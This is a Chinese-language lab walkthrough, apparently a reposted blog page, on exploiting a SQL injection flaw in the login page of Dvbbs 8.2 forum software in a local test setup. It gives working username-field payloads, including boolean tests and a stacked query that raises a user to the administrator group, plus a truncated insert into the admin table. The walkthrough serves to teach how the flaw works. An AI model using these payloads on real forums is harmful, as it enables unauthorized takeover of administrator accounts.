动网论坛8.2经典注入漏洞利用

一、实验目的

理解动网论坛8.2原理

二、实验原理

动网论坛用户登录过程中,过滤不严,导致注入,提升权限。漏洞存在源文件的login.asp中。

三、实验环境

本机:192.168.1.2
目标机:192.168.1.3

四、 实验步骤

一、正常注册登录
1、访问地址:http://192.168.1.3:8010/,如图示:
动网论坛8.2经典注入漏洞利用_第1张图片
2、首先注册一个用户:san 密码:123456,如图:
动网论坛8.2经典注入漏洞利用_第2张图片
二、漏洞测试与利用
1、退出san ,打开登录界面:
动网论坛8.2经典注入漏洞利用_第3张图片
2、使用以下语句登录:san’ and ‘a’=’ a 密码:123456
动网论坛8.2经典注入漏洞利用_第4张图片
3、使用以下语句再次登录:san’ and ‘a’=’ b 密码:123456
动网论坛8.2经典注入漏洞利用_第5张图片
4、提示用户不存在,说明以上语句起作用了,用户名处输入:

,;update dv_user set usergroupid=1 where username='san'--

动网论坛8.2经典注入漏洞利用_第6张图片
5、提示用户名不存在,我们再次使用正确用户名和密码san 123456登录。在控制面板-我能做什么中,点击后,显示已是管理员组用户。
这里写图片描述

6、san用户为管理员身份,退出,我们再次使用以下语句登录,密码为正确密码(此处步骤重要):

san’;insert into dv_admin

7、打开管理员界面http://192.168.1.3:8010/admin

使用用户名:admin 密码:123456成功登陆

8、登陆后发现已是管理员身份,如图:
动网论坛8.2经典注入漏洞利用_第7张图片

你可能感兴趣的:(web安全漏洞)